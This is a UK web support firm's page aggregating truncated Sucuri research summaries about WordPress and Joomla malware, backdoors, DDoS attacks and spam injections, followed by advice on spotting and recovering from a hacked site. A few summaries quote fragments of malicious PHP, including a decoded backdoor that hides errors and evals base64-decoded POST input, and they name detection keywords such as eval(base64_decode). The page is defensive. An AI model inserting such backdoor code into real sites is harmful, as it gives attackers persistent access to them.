Website support, maintenance and fixes for UK businessesCall 0208 088 8371info@websupportservices.co.uk

HomeLatest WordPress security threats

Latest WordPress security threats

This page brings together recent WordPress security research and attack reports from Wordfence, Patchstack, Sucuri and WPScan. We summarise the headlines and link to the original vendor research so you can read the source in full.

1,879 reports kept since 2009. Updated automatically every 10 minutes. Last checked 8 min ago.

  1. BaDoink Website Redirect - Malicious Redirections to Porn Websites on Mobile Devices

    Research Sucuri, 26 May 2014

    The past week has brought about a large number of cases where compromised websites had hidden redirections to porn injected into their code. All the infections had a similar pattern where they only targeted mobile devices. They are highl...

  2. Sucuri CloudProxy - Website Firewall Enhancements

    Research Sucuri, 22 May 2014

    When LA’s DA says that, “73% of our local businesses appear to have been hacked,” it begins to illustrate the importance website protection will play in the future of business, which is why we’ve placed so much emphasis on website protec...

  3. Watch a Layer 7 DDOS Attack - WordPress Security

    Research Sucuri, 15 May 2014

    A few weeks back we reported on very large Layer 7 DDOS attacks within the WordPress ecosystem. Today we decided to provide you a little illustration of what that looks like. Remember, there is a big difference between Brute Force and De...

  4. Does Sucuri Work With My Host? Yes, Yes We Do.

    Research Sucuri, 7 May 2014

    We’ve been scanning and removing malware from websites for years and in this time frame we have seen the website security domain grow by leaps and bounds. Over the same period, the ubiquity of the internet has reached to all corners of t...

  5. SiteCheck Extended - Making It Easier to Scan Your Websites

    Research Sucuri, 2 May 2014

    Sucuri SiteCheck is our free website malware scanner that crawls any website to detect signs of malware injections, SEO spam, blacklisting, defacement and other similar indicators of a compromised website. It is widely used by webmasters...

  6. AdSense Blackmail - Hacking Websites for Profit

    Research Sucuri, 29 Apr 2014

    We deal with different types of malware injections and compromises everyday and the most common question our clients ask us is, “Why me? Why my small little site?” There are so many answers to this question. In some cases, someone may at...

  7. PHP Callback Functions: Another Way to Hide Backdoors

    Research Sucuri, 25 Apr 2014

    We often find new techniques employed by malware authors. Some are very interesting, others are pretty funny, and then there are those that really stump us in their creativity and effectiveness. This post is about the latter. Everyone wh...

  8. Joomla Plugin Constructor Backdoor

    Research Sucuri, 23 Apr 2014

    We recently wrote about backdoors in pirated commercial WordPress plugins. This time it will be a short post about an interesting backdoor we found in a Joomla plugin. It was so well organized that at first we didn’t realize there was a ...

  9. Double hidden style - Hiding spam

    Research Sucuri, 17 Apr 2014

    We see many tricks that hackers use to make search engine bots think that the injected spam is not hidden. One of the common approaches is to place a spam block inside a div with some particular id or class and then add a JavaScript call...

  10. Critical Update for JetPack WordPress Plugin

    Research Sucuri, 10 Apr 2014

    The Jetpack team just released a critical security update to fix a security vulnerability in the Jetpack WordPress plugin. The vulnerability allows an attacker to bypass the website’s access control and publish posts on the site. All ver...

  11. Ad Violations: Why Search Engines Won’t Display Your Site If it’s Infected With Malware

    Research Sucuri, 2 Apr 2014

    As your website’s webmaster have you ever seen an e-mail from Google like this?: Hello, We wanted to alert you that one of your sites violates our advertising policies. Therefore, we won’t be able to run any of your ads that link to that...

  12. Unmasking “Free” Premium WordPress Plugins

    Research Sucuri, 26 Mar 2014

    WordPress has a large repository of free plugins (currently 30,000+) that can add almost any functionality to your blog. However, there is still a market for premium plugins. Premium plugins are especially popular when they help blogs ma...

  13. Understanding Denial of Service and Brute Force Attacks - WordPress, Joomla, Drupal, vBulletin

    Research Sucuri, 12 Mar 2014

    Many are likely getting emails with the following subject header: Large Distributed Brute Force WordPress Attack Underway - 40,000 Attacks Per Minute . Just this week we put out a post entitled: More Than 162,000 WordPress Sites Used for...

  14. More Than 162,000 WordPress Sites Used for Distributed Denial of Service Attack

    Research Sucuri, 10 Mar 2014

    Distributed Denial of Service (DDoS) attacks are becoming a common trend on our blog lately, and that’s okay because it’s a very serious issue for every website owner. Today I want to talk about a large DDoS attack that leveraged thousan...

  15. Highly Effective Joomla Backdoor with Small Profile

    Research Sucuri, 27 Feb 2014

    It feels like every day we’re finding gems, or what appear to be gems to us. We try to balance the use of the term, but I can’t lie - these are truly gems. The methods that attackers are implementing are, in some instances, ingenious. I ...

  16. SiteCheck Chrome Extension Now Available

    Research Sucuri, 20 Feb 2014

    Have you ever wondered if the websites you (or your family) visit contain code that is potentially harmful to you or your computer? If you are a Chrome user, then you’re in luck because we’ve made it much simpler for you to utilize SiteC...

  17. Malicious iFrame Injections Host Payload on Tumblr

    Research Sucuri, 19 Feb 2014

    It’s always fun to watch malware developers using different techniques to code their creations. Sometimes it’s a matter of obfuscation, placement, injection, but this time we will look at how they code it to be dynamic. I believe this is...

  18. PHP Backdoors: Hidden With Clever Use of Extract Function

    Research Sucuri, 17 Feb 2014

    When a site gets compromised, one thing we know for sure is that attackers love to leave malware that allows them access back into the site; this type of malware is called a backdoor. This type of malware was named this because it allows...

  19. Mysterious Zencart Redirects Leverage HTTP Headers

    Research Sucuri, 16 Feb 2014

    About a week ago we got an interesting Zencart case. Being that we don’t often write about Zencart we figured it’d be good time to share the case and details on what we found. The Scenario The site was redirecting to “ www .promgirl .de ...

  20. Joomla JomSocial Remote Code Execution Vulnerability

    Research Sucuri, 10 Feb 2014

    The JomSocial team just released an update that fixes a very serious remote code execution vulnerability that affects any JomSocial version older than 3.1.0.4. From their hot-fix update: Yesterday we released version 3.1.0.4 which fixes ...

  21. Darkleech + Bitly.com = Insightful Statistics

    Research Sucuri, 7 Feb 2014

    This post is about how hackers abuse popular web services and how this helps security researchers obtain interesting statistics about malware attacks. We, at Sucuri, work with infected websites every day. While we see some particular inf...

  22. Many Pieces of a Puzzle: Target, Neiman Marcus and Website Hacking

    Research Sucuri, 5 Feb 2014

    Corporations get hacked all the time. This is not news to anyone in the security business, but it has certainly received a lot of attention from those in the media over the last few weeks because of a couple of large-scale credit card ev...

  23. Website Mesh Networks Distributing Malware

    Research Sucuri, 24 Jan 2014

    Can you imagine having the keys to a kingdom? How awesome would that be!! This is true in all domains, especialy when it comes to your website. This is almost like the holy grail of website attacks, gain access and do what you want with ...

  24. Recent OptimizePress Vulnerability Being Mass Infected

    Research Sucuri, 17 Jan 2014

    A few weeks ago we wrote about a file upload vulnerability in the OptmizePress theme. We were seeing a few sites being compromised by it, but nothing major. That all changed yesterday when we detected roughly 2,000 websites compromised w...

  25. The Hidden Backdoors to the City of Cron

    Research Sucuri, 16 Jan 2014

    An attacker’s key to creating a profitable malware campaign is persistence. Malicious code that is easily detected and removed will not generate enough value for the attacker. This is the reason why we are seeing more and more malware us...

  26. Sucuri Company Meeting - Brazil 2014

    Research Sucuri, 15 Jan 2014

    2013 was a great year for Sucuri! We were able to add some great services and tools like CloudProxy to help website owners and administrators fight malware. We also grew the Sucuri team quite a bit in an effort to support our products, a...

  27. PHP str_replace to hide malware

    Research Sucuri, 3 Jan 2014

    We found another interesting piece of PHP-based malware on a client site a few days ago: $exg="JGMnd9J2NvdW50JzskYTnd0kX0ndNPndT0tJRTtpZihyZXNldCgkndYSk9PSdtandCcgJndiYgJGMondJGEpPjM"; $iyo="GxhndY2UndoYXJyYndXkoJy9bndXlndx3PVxzXS8nLndCc...

  28. WordPress OptimizePress Theme - File Upload Vulnerability

    Research Sucuri, 12 Dec 2013

    We’re a few days short on this, but it’s still worth releasing as the number of attacks against this vulnerability are increasing ten-fold. The folks at OSIRT were the first to report this in late November, 2013. In our cases we’re seein...

  29. How to eval() without eval() in PHP

    Research Sucuri, 11 Dec 2013

    According to our daily malware analysis experience, we’ve noticed that the bad guys are using obfuscation more and more to hide what they are doing. Take for example this piece of code we found injected on a website: $uhn = “IdsdMR8PY8e1...

  30. How We Decoded Some Nasty Multi-Level Encoded Malware

    Research Sucuri, 9 Dec 2013

    From time to time, we come up with interesting bits of malware that are just calling us to decode and learn more about them. This is one of those cases. Recently, I crossed pathes with this little gem: That snippet is encoded malicious c...

  31. Phishing Emails to Install Malicious WordPress Plugins

    Research Sucuri, 4 Dec 2013

    When all else fails, the bad guys can always rely on some basic social engineering tactics with a little hit of phishing!! Over the weekend, a few of our clients received a very suspicious email telling them to download a new version of ...

  32. Stealing Credit Cards - A WordPress and vBulletin Hack

    Research Sucuri, 28 Nov 2013

    What better way to celebrate Thanksgiving than to share an interesting case that involves two of the most popular CMS applications out there - vBulletin and WordPress. Here is a real case that we just worked on this week, involving an at...

  33. WordPress password stealer

    Research Sucuri, 27 Nov 2013

    Following Fio’s recent post on the Joomla password stealer, here’s another beautiful example of password stealer. This time from WordPress environment. It’s easy to understand, but what’s interesting - it looks like legitimate code so yo...

  34. Another Fake WordPress Plugin - And Yet Another SPAM Infection!

    Research Sucuri, 23 Nov 2013

    We clean hundreds and thousands of infected websites, a lot of the cleanups can be considered to be somewhat “routine”. If you follow our blog, you often hear us say we’ve seen “this” numerous times, we’ve cleaned “that” numerous times. ...

  35. The Story of Clip:rect - A Black Hat SEO Trick

    Research Sucuri, 21 Nov 2013

    We regularly write about Black Hat SEO hacks here. Such hacks help hackers monetize their access to compromised sites by incorporating them into massive schemes that try to manipulate search engine results for queries that potential clie...

  36. Understanding Google’s Blacklist - Cleaning Your Hacked Website and Removing From Blacklist

    Research Sucuri, 20 Nov 2013

    Today we found an interesting case where Google was blacklisting a client’s site but not sharing the reason why. The fact they were sharing very little info should not be new, but what we found as we dove a little deeper should be. The i...

  37. Case Study: Analyzing a WordPress Attack - Dissecting the webr00t cgi shell - Part I

    Research Sucuri, 8 Nov 2013

    November 1st started like any other day on the web. Billions of requests were being shot virtually between servers in safe and not so safe attempts to access information. After months of waiting, finally one of those not so safe request ...

  38. PHP://input Backdoor

    Research Sucuri, 8 Nov 2013

    Just came across this backdoor (decoded): @error_reporting(0); @ini_set("display_errors",0); @ini_set("log_errors",0); @ini_set("error_log",0); if (isset($_GET['r'])) { print $_GET['r']; } elseif (isset($_POST['e'])) { eval ( base64_deco...

  39. Blackhat SEO and ASP Sites

    Research Sucuri, 6 Nov 2013

    It’s all too easy to scream and holler at PHP based websites and the various malware variants associate with the technology, but perhaps we’re a bit too biased. Here is a quick post on ASP variant. Thought we’d give you Microsoft types s...

  40. Joomla - Fancy SPAM Injections

    Research Sucuri, 5 Nov 2013

    Malware writers can be really ingenious when it comes to obfuscating their code. And let’s face it, in today’s anti-malware push, they have to; the slightest variation will often trigger warnings that will make it look suspicious in turn...

  41. Understanding Search Engine Warnings - Part I - Google - This Site May Be Hacked

    Research Sucuri, 29 Oct 2013

    If you have any questions about malware, blacklisting, or security in general, send them to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, go here. Question: I just found out that my site is being flagg...

  42. Backdoor Evasion Using Encrypted Content

    Research Sucuri, 28 Oct 2013

    A few weeks ago on the Sucuri Research Labs we mentioned a new type of malware injection that does not use base64_decode, and instead conceals itself as a variable and is built with a combination of “base_” + (32*2) + “_decode”. This is ...

  43. Cleaning Up Your WordPress Site with the Free Sucuri Plugin

    Research Sucuri, 16 Oct 2013

    Update 9/9/16 : We released a new guide to cleaning a hacked WordPress site with our plugin. If your site has been recently hacked and you are trying to clean it up yourself, we recommend that you use SiteCheck Malware Scanner , our Free...

  44. Sucuri CloudProxy WAF Plugin for WordPress

    Research Sucuri, 10 Oct 2013

    If you are using our CloudProxy WAF to protect your WordPress websites, we highly recommend that you also install our new CloudProxy plugin for WordPress. It has been public for a few weeks, and now we feel it is ready for production use...

  45. Do you still look for base64_decode?

    Research Sucuri, 9 Oct 2013

    A common keyword that people use to find hidden injections on web sites is base64_decode. Youoften see injections that look like eval ( base64_decode or eval ( gzinflate ( base64_decode beingused by the attackers. So most web security to...

  46. Avira, AVG and WhatsApp Defaced

    Research Sucuri, 8 Oct 2013

    If you visited the web sites for Avira, AVG or WhatsApp this morning, you probably saw that they didn’t look like they should. All of them were defaced and looked like this: It is a bit horrifying when you see such big sites, including s...

  47. Malware iFrame Campaign from Sytes(.)net

    Research Sucuri, 4 Oct 2013

    For the last few weeks we have been tracking a large malframe (malicious iframe) campaign that has been injecting iframes from random domains from sytes(.)net into compromised sites. Malicious iframe injection is nothing new, the bad guy...

  48. WordPress Database Table and wp_head Injections

    Research Sucuri, 30 Sep 2013

    There are multiple places where a malware injection can be hidden on a web site. On WordPress, for example, it can be hidden inside the core files, themes, plugins, .htaccess and on the database. More often than not, the malware uses a c...

  49. Sucuri Expands Research Efforts with Acquisition of Unmask Parasites

    Research Sucuri, 20 Sep 2013

    Our goal at Sucuri is to be the best website security company of today and in the future. To help build on our existing research efforts, and to expand our ability to scan websites and detect malware, we are very excited to announce the ...

  50. Ask Sucuri: Non-Alphanumeric Backdoors

    Research Sucuri, 12 Sep 2013

    If you have any questions about malware, blacklisting, or security in general, send them to contact@sucuri.net and we will write a post about it and share. For all the “Ask Sucuri” answers, go here. Question: My site got hacked and I am ...

Common types of WordPress compromise

WordPress compromises do not all look the same. Some are obvious to visitors, while others are designed to remain unnoticed. A site may start sending visitors to an unrelated domain, display pages or links that the owner never created, or contain a backdoor that allows an attacker to return after the visible problem has been removed.

Other compromises can involve rogue administrator accounts or fake plugins placed in the WordPress installation to blend in with legitimate software. On WooCommerce sites, malicious code may target the checkout process or other pages that handle customer data. The presence of unfamiliar code is not enough on its own to identify what happened, so the investigation needs to establish what changed, when it changed and how the attacker gained access.

Outdated components are one possible route, but compromised passwords, exposed hosting credentials and other weaknesses can also matter. WordPress recommends keeping software current, using strong passwords, controlling file permissions and maintaining reliable backups as part of normal hardening.

Signs your WordPress site may be hacked

Unexpected redirects are a common warning sign, particularly when they appear only on certain devices, browsers or traffic sources. Other clues include unfamiliar administrator users, pages you did not publish, altered titles or search snippets, unexplained file changes, new scheduled tasks, or security warnings in Google Search Console.

Performance problems can also justify investigation, but a slow site does not automatically mean malware. The same applies to unusual server load or email activity. Treat these as signals to inspect logs, files, users and recent changes rather than proof of a specific infection.

Google recommends using the Security Issues report in Search Console when hacked content or malware is suspected. A simple site search can also reveal indexed pages that do not belong to you. If you find something unexpected, record it before making changes so you have evidence to compare during cleanup.

What to do first if you think your WordPress site is hacked

Do not begin by deleting every suspicious file you can see. First take a copy of the affected site and database, note the time the problem was found and preserve relevant logs where available. This gives you something to examine if the visible symptoms return or if you need to identify the original entry point.

Change passwords for WordPress administrators, hosting, SFTP or FTP, the database and other privileged services that could have been exposed. Review all administrator accounts and remove access you do not recognise. Then decide whether the safest recovery route is a clean restoration from a known good backup or a controlled malware cleanup.

The job is not finished when the unwanted page or redirect disappears. Check themes, plugins, WordPress core, configuration files and scheduled tasks for persistence, update vulnerable components and close the route that allowed access. If Google has flagged the site, follow its hacked site guidance and request review only after the site has been cleaned. Our WordPress malware removal page explains the recovery service. Hacked Site Rescue is £249 fixed price.

Common questions

Answers to the questions we hear most about this.

How can I tell if my WordPress site has malware?

Look for unexpected redirects, unfamiliar administrator accounts, pages or links you did not create, unexplained file changes and security warnings in Google Search Console. None of these signs identifies the cause by itself, so the site still needs investigation.

Should I delete suspicious files straight away?

Not necessarily. Take a copy of the site and database first and preserve useful logs where possible. Deleting visible files before recording the incident can remove evidence without closing the route used to gain access.

Can restoring a backup fix a hacked WordPress site?

A clean backup can be an effective recovery route if it predates the compromise, but you still need to identify and fix the entry point. Otherwise the same weakness can remain after the restore.

What should I change after a WordPress hack?

Change privileged passwords, review administrator users, update vulnerable software and inspect the site for persistence such as backdoors or altered scheduled tasks. The exact steps depend on how the compromise occurred.

Think your website has been hacked?

Call us or send the details. Hacked Site Rescue is a fixed £249, and we find how the attacker got in.

Get website support